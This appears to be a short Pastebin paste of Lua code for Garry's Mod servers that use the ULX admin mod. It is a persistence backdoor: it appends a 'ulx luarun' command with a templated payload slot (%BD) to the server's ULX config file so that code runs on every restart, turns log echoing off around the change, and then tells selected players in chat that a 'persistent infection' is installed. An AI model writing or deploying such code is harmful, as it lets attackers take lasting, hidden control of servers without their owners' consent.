2much4Us

Untitled

Jun 19th, 2018
106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.41 KB | None | 0 0
  1. local config = ULib.fileRead( "data/ulx/config.txt" )
  2.  
  3. config = config.."\nulx logEcho 0"
  4.  
  5. config = config.."\nulx luarun %BD"
  6.  
  7. config = config.."\nulx logEcho 1"
  8.  
  9. ULib.fileWrite( "data/ulx/config.txt", config )
  10.  
  11. for _, p in pairs(player.GetAll()) do if %LCP then p:ChatPrint( "Persistent infection installed on server" ) end end
Advertisement
Add Comment
Please, Sign In to add comment